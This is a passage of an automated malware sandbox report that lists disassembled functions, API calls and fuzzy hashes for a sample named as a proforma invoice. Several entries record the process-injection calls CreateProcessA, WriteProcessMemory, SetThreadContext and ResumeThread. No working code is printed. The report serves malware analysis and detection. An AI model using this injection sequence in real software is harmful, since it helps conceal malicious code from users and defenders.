                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07372877
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherFocusUser
                                                                                            • String ID:
                                                                                            • API String ID: 1077007772-0
                                                                                            • Opcode ID: c32e077411cb4224f5fcbf694e0142f6171ae3a92392d269777b61ff836055ca
                                                                                            • Instruction ID: 722c7c4a3a458c78df45b83f95850e5b459376ec1e9b4ac2c0f3997eae250f72
                                                                                            • Opcode Fuzzy Hash: c32e077411cb4224f5fcbf694e0142f6171ae3a92392d269777b61ff836055ca
                                                                                            • Instruction Fuzzy Hash: 4D314FB1E002259FDB209F69C544AAEBBB5BF48710F154459E909EB351CB35DC44CBD1
                                                                                            Function 073727B0 Relevance: 3.1, APIs: 2, Instructions: 75windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1161 73727b0-73727b2 1162 73727b3-73727b8 1161->1162 1162->1162 1163 73727ba-7372802 1162->1163 1164 7372804-737280f 1163->1164 1165 737287e-7372881 1163->1165 1164->1165 1172 7372811-7372837 GetFocus 1164->1172 1166 73728a6-73728a8 1165->1166 1168 73728b5-73728b7 1166->1168 1169 73728aa-73728b3 1166->1169 1170 73728d7-73728e4 1168->1170 1171 73728b9-73728c2 1168->1171 1169->1168 1178 7372883-737288f 1169->1178 1171->1170 1180 73728c4-73728d1 1171->1180 1174 7372840-7372849 1172->1174 1175 7372839-737283f 1172->1175 1176 7372860-737287c KiUserCallbackDispatcher 1174->1176 1177 737284b-737285e 1174->1177 1175->1174 1176->1170 1177->1170 1177->1176 1178->1168 1186 7372891-73728a4 1178->1186 1180->1170 1186->1166
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 07372826
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07372877
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherFocusUser
                                                                                            • String ID:
                                                                                            • API String ID: 1077007772-0
                                                                                            • Opcode ID: 3ae5a012fc39f5a5ee025e2de83aee43beb3bdae8d17a5cb220a2b47707f4798
                                                                                            • Instruction ID: bcb5a247de6ec4c2c84fe4d6e83ef077921680b31921d3069febeed4cf0856fa
                                                                                            • Opcode Fuzzy Hash: 3ae5a012fc39f5a5ee025e2de83aee43beb3bdae8d17a5cb220a2b47707f4798
                                                                                            • Instruction Fuzzy Hash: E0215CB5D042999FDB218FA9C5447AEFFB4FB08710F1481AAD808A7351C335A945CFA1
                                                                                            Function 0727205C Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0727229E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 010ae2048cb84dc4e1fc427f51ae713fe9353d9c5e259fdfd9870af5acac4f92
                                                                                            • Instruction ID: 1b0aa53c3f3d360841011c819c8be909c956d047dfb65d83d5da3ca4a11be087
                                                                                            • Opcode Fuzzy Hash: 010ae2048cb84dc4e1fc427f51ae713fe9353d9c5e259fdfd9870af5acac4f92
                                                                                            • Instruction Fuzzy Hash: 5AA148B1D1021ADFDB24CF68CA417EDBBF2BB48314F1481A9E818A7250DB749985CF92
                                                                                            Function 07272068 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0727229E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 7f25b0d456f22b61cd9fa055efe043c84408612046ee9f6bf815b5d638450e73
                                                                                            • Instruction ID: f088b6fe9821328fef21b777c8a11c4fc672d15c3823a1ea099d4fa37dcc54a8
                                                                                            • Opcode Fuzzy Hash: 7f25b0d456f22b61cd9fa055efe043c84408612046ee9f6bf815b5d638450e73
                                                                                            • Instruction Fuzzy Hash: 709138B1D1021ADFDB24CF68C9417EDBBF6BB48314F1481A9E818A7250DB749985CF92
                                                                                            Function 00A5AE78 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00A5B0DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 69ec8f8074eaed935129d3d7d7541be05734c7f2c56007508a6c600af6a521b9
                                                                                            • Instruction ID: c9bb3189e775eff7ddafc3997d00219350b42aeea41f5cb1624b591f13a53cab
                                                                                            • Opcode Fuzzy Hash: 69ec8f8074eaed935129d3d7d7541be05734c7f2c56007508a6c600af6a521b9
                                                                                            • Instruction Fuzzy Hash: 6D917870A00B458FD725CF29D55179ABBF1FF88305F048A2EE88AC7A51D735E849CB91
                                                                                            Function 04DE0BA0 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03794128,027B0A0C,?,00000000), ref: 04DE0CFE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6a9754675c427db3bd801cb431467e904b451522b80b89f1f662446550c3d110
                                                                                            • Instruction ID: a3b694241601da3ea924a92a55c2ce566f94be8f2696005cd5215ba31f9ac315
                                                                                            • Opcode Fuzzy Hash: 6a9754675c427db3bd801cb431467e904b451522b80b89f1f662446550c3d110
                                                                                            • Instruction Fuzzy Hash: 12717D74A01218AFCB15EF6AD484DAEBBB6FF48714F114498F905AB361DB71E881CB50
                                                                                            Function 00A55914 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00A559D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 3bcc30d4065ef4741e53500abb48b9d8bc918f1100d9b8c41d6463d89cd80339
                                                                                            • Instruction ID: 00919ffd51411a3fbfc64cb658143e436cde8ddf540112267181989775e6004d
                                                                                            • Opcode Fuzzy Hash: 3bcc30d4065ef4741e53500abb48b9d8bc918f1100d9b8c41d6463d89cd80339
                                                                                            • Instruction Fuzzy Hash: 9941F5B0C0061DCFDB24CFA9C894BDEBBB5BF45304F24806AD808AB255D775694ACF90
                                                                                            Function 00A544C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00A559D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 3760581993a767fab959a4cccb5fa5009326dd17e1a7a78299d8aa9957ca28d2
                                                                                            • Instruction ID: 528074bcce66167fbc7a4db41aa76541865e889c88937c1c7ec987b47623e206
                                                                                            • Opcode Fuzzy Hash: 3760581993a767fab959a4cccb5fa5009326dd17e1a7a78299d8aa9957ca28d2
                                                                                            • Instruction Fuzzy Hash: 9541D1B0C0061DCFDB24DFA9C944B9EBBB5FF48304F24806AD809AB255DB756949CF90
                                                                                            Function 0737B2F0 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2558294473-0
                                                                                            • Opcode ID: 9b49e70f03a3c7f793e132052744900a0d6f50fac3594ffe325c0dc8e8b55489
                                                                                            • Instruction ID: 0f62585fb5289b6988ebe227e053d4208dc07dd14558f19ad715fcf537f59f56
                                                                                            • Opcode Fuzzy Hash: 9b49e70f03a3c7f793e132052744900a0d6f50fac3594ffe325c0dc8e8b55489
                                                                                            • Instruction Fuzzy Hash: ED31ABF1900219CFFB20DFAAC9897AEFBB4FB45304F24842AD559A3640C7799189CF61
                                                                                            Function 07271B30 Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 4be22c3344e92d80338829a358f695e28c40efe11c1f9b6fa675888d5b7ff36b
                                                                                            • Instruction ID: 8f473bd70ba2a21b3ae4ba32a9d5be0e9a71f424414fc91a0c1fa1007fbc2bc8
                                                                                            • Opcode Fuzzy Hash: 4be22c3344e92d80338829a358f695e28c40efe11c1f9b6fa675888d5b7ff36b
                                                                                            • Instruction Fuzzy Hash: E531BCB09042898FCB10CFA9C9557EEFFF4EF85324F20849AD558A72A1C7349942CB96
                                                                                            Function 07277809 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 072778BC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfo
                                                                                            • String ID:
                                                                                            • API String ID: 3534257612-0
                                                                                            • Opcode ID: 3daac6ec5722794d1e4b7d1f8218dd123dd0cac60c09be288b7116ca0c0c0386
                                                                                            • Instruction ID: 867acae3cda47c38e1ef38ae48394e320701be3011581c35b5c9c82e6f536907
                                                                                            • Opcode Fuzzy Hash: 3daac6ec5722794d1e4b7d1f8218dd123dd0cac60c09be288b7116ca0c0c0386
                                                                                            • Instruction Fuzzy Hash: 0F31A2B19093959FDB15CFA9C8946DEFFF4EF4A310F1480AED444A7252D338A809CB65
                                                                                            Function 07278A30 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 07278AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: b2b28a4aeae38bc87b18423c9b55a717150a866fe506cd0b59d37d24e6fe69ba
                                                                                            • Instruction ID: b4deb3689d3767b74aee05cb0462634c9705f1fa95f24b0a8d19460118fa09c7
                                                                                            • Opcode Fuzzy Hash: b2b28a4aeae38bc87b18423c9b55a717150a866fe506cd0b59d37d24e6fe69ba
                                                                                            • Instruction Fuzzy Hash: 8421FF76B001069FEB14EB69DC01BAAB7A6FFC4314F088165E5099B355CB74E822CB90
                                                                                            Function 07271DD8 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07271E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 0fc7a64b54454c7e0eaa9dd4a35a732f939b01b1b3f244c558c8c5c53abd3605
                                                                                            • Instruction ID: fc6f8bc7e3f7f6f8bb318581d76e7a8ae5e3fa04277785d9119b08b2893947d7
                                                                                            • Opcode Fuzzy Hash: 0fc7a64b54454c7e0eaa9dd4a35a732f939b01b1b3f244c558c8c5c53abd3605
                                                                                            • Instruction Fuzzy Hash: DA2148B590035ADFCB10CFA9C981BDEBBF5FF48310F108429E959A7250C7749955CBA4
                                                                                            Function 07274B12 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL(00000001,?,?,?,?), ref: 07274BD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 839d5047e51f90d521db1a501343f4b11c3f718d0e30ff0ba0454395eed3a579
                                                                                            • Instruction ID: 18441beaffea39659a415290fb2f97003089465f1736a4adce8b402fd1826576
                                                                                            • Opcode Fuzzy Hash: 839d5047e51f90d521db1a501343f4b11c3f718d0e30ff0ba0454395eed3a579
                                                                                            • Instruction Fuzzy Hash: 47312870D052499FCB01DFB8D8559EEBFB2FF49340F0480AAE554AB252D7346A46CF91
                                                                                            Function 04DED714 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04DEECA5,?,?), ref: 04DEED57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: de6bcab0441670ff6c3f10a1d65b9cfcc90caed38bb97c7ce556faaecdddfd50
                                                                                            • Instruction ID: 6309e027b347563712a5583f52a3711599200b421e13b87ccc34b5344801f7a6
                                                                                            • Opcode Fuzzy Hash: de6bcab0441670ff6c3f10a1d65b9cfcc90caed38bb97c7ce556faaecdddfd50
                                                                                            • Instruction Fuzzy Hash: 4331EEB5D002099FDB10DF9AD884AEEFBF4FB48320F14842AE919A7310D375A944CFA0
                                                                                            Function 07277730 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 072777CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: 5dbbca8ed5b26907fc91a9980f4ac092ddbcfd02ac8b3cd8fc8b1cd157248afc
                                                                                            • Instruction ID: b51688f82d6fef70bd0e43df02ff577b6b9253ba95e064c945e4a169898808b5
                                                                                            • Opcode Fuzzy Hash: 5dbbca8ed5b26907fc91a9980f4ac092ddbcfd02ac8b3cd8fc8b1cd157248afc
                                                                                            • Instruction Fuzzy Hash: C92139B6C0424A8FDB10CF9AC984ADEBBF4EF49310F14C06AD854A7251D338A54ACF65
                                                                                            Function 04DEECB8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04DEECA5,?,?), ref: 04DEED57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText
                                                                                            • String ID:
                                                                                            • API String ID: 2175133113-0
                                                                                            • Opcode ID: 6b0bc4a1265759a112af404293fbb3b8d66e68862bbe2af4fc0c8c8e0fbc8dd6
                                                                                            • Instruction ID: 8d009721ed91df9cd28c3ca517625b6e832485c0be96945898575a74474b3761
                                                                                            • Opcode Fuzzy Hash: 6b0bc4a1265759a112af404293fbb3b8d66e68862bbe2af4fc0c8c8e0fbc8dd6
                                                                                            • Instruction Fuzzy Hash: D631C0B5D002099FDB10DF9AD984AEEBBF5BF48320F14842AE519A7650D374A944CFA1
                                                                                            Function 0727F1E0 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0727F272
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: 6c66618997f64c754e093196b3815b7432bbe7344db218fe91b76994e006daaa
                                                                                            • Instruction ID: 6a58aa3fff73d812253f8cb5099459f11927848652567584f6e429992a957943
                                                                                            • Opcode Fuzzy Hash: 6c66618997f64c754e093196b3815b7432bbe7344db218fe91b76994e006daaa
                                                                                            • Instruction Fuzzy Hash: 693143B090428A8FCB00DFA9C945A9EFBB0FF49310F14C55AD458AB212C334A949CFA1
                                                                                            Function 07271DE0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07271E70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 5dfeef7057e28106716cb3da0e51575ea324eab450f69d821b7a415e89ece427
                                                                                            • Instruction ID: bee4d507e819ddbff5e794a438ce5d4123abe9c608e78b7ab86ca464cd1cb043
                                                                                            • Opcode Fuzzy Hash: 5dfeef7057e28106716cb3da0e51575ea324eab450f69d821b7a415e89ece427
                                                                                            • Instruction Fuzzy Hash: 8A2136B190035ADFCB10CFA9C985BDEBBF5FF88310F10842AE959A7250C7789954CBA4
                                                                                            Function 07271C41 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07271CC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: d08bfe725266b346ea6961b87935dcd19d9ef167ec310ceb70705acaa5520452
                                                                                            • Instruction ID: acf236046ad7579b017836f1cbfee92c06e4240ec84fec68c507850c74ecf255
                                                                                            • Opcode Fuzzy Hash: d08bfe725266b346ea6961b87935dcd19d9ef167ec310ceb70705acaa5520452
                                                                                            • Instruction Fuzzy Hash: 162148B191020A8FDB10DFAAC5857EEBBF4EF88324F14842DD459A7240CB789985CBA5
                                                                                            Function 00A5D768 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A5D7F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: e2014fbe31ea7e5f5621f45fe34f49ecb1e14e83e8a30e502b855bd75116cd3f
                                                                                            • Instruction ID: ef6d8b24757fb793f3588b825890c2e2916c347ea8882f6fa43ef2ab9e94cc40
                                                                                            • Opcode Fuzzy Hash: e2014fbe31ea7e5f5621f45fe34f49ecb1e14e83e8a30e502b855bd75116cd3f
                                                                                            • Instruction Fuzzy Hash: B221F4B5900249DFDB20CFAAD584ADEBFF4EB48310F14841AE954A3210D374A945CF60
                                                                                            Function 07271EC9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07271F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 1cec2caedd1bb572beca7033a2fa53449c5bd8acaa0b4e2fa00effb4fa02c356
                                                                                            • Instruction ID: 2e708645e29af096c994c3baa1395bea24a114e21defb0a37a23e7b0315a348f
                                                                                            • Opcode Fuzzy Hash: 1cec2caedd1bb572beca7033a2fa53449c5bd8acaa0b4e2fa00effb4fa02c356
                                                                                            • Instruction Fuzzy Hash: 5D2116B1900259DFCB10DFAAC980AEEFBF5FF88320F10842AE559A7250D7349955CBA5
                                                                                            Function 07375F81 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07376005
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: d8334124396b547be33e71513ee106c69969f4a9ce22a188e2d7bea396ec35c7
                                                                                            • Instruction ID: 7a506d8c1145d80e6e794a5c3f6074530646dc10f6f3d9eaae012951b1caa72c
                                                                                            • Opcode Fuzzy Hash: d8334124396b547be33e71513ee106c69969f4a9ce22a188e2d7bea396ec35c7
                                                                                            • Instruction Fuzzy Hash: 3A216DB180438ADFDB11CF95C855BDABFF4EF0A310F14849AD454A7252D378A954CFA1
                                                                                            Function 07271ED0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07271F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: 181311baa2eeef6f73d69cdbfa36506893e02c9a525392552ebf38a8f57168d4
                                                                                            • Instruction ID: dd32d1076d4b6d18f0aeac707bb36f85f682b265de969470d8412aed527b69b0
                                                                                            • Opcode Fuzzy Hash: 181311baa2eeef6f73d69cdbfa36506893e02c9a525392552ebf38a8f57168d4
                                                                                            • Instruction Fuzzy Hash: 462116B18003599FCB10DFAAC980ADEFBF5FF48320F108429E559A7250C7349954CBA5
                                                                                            Function 07271C48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07271CC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: fd7882a9322d4e7f731a6c06042abb2223e09d5ac747961c831228d976e4e6b5
                                                                                            • Instruction ID: 45f82d12074e589b33c4172ce37af6bd16bc5fa19fb3ba63431e25da9c3052dd
                                                                                            • Opcode Fuzzy Hash: fd7882a9322d4e7f731a6c06042abb2223e09d5ac747961c831228d976e4e6b5
                                                                                            • Instruction Fuzzy Hash: D72138B1D102098FDB10DFAAC5857EEBBF4EF88324F10842DD459A7240CB78A945CFA5
                                                                                            Function 0727F2DA Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
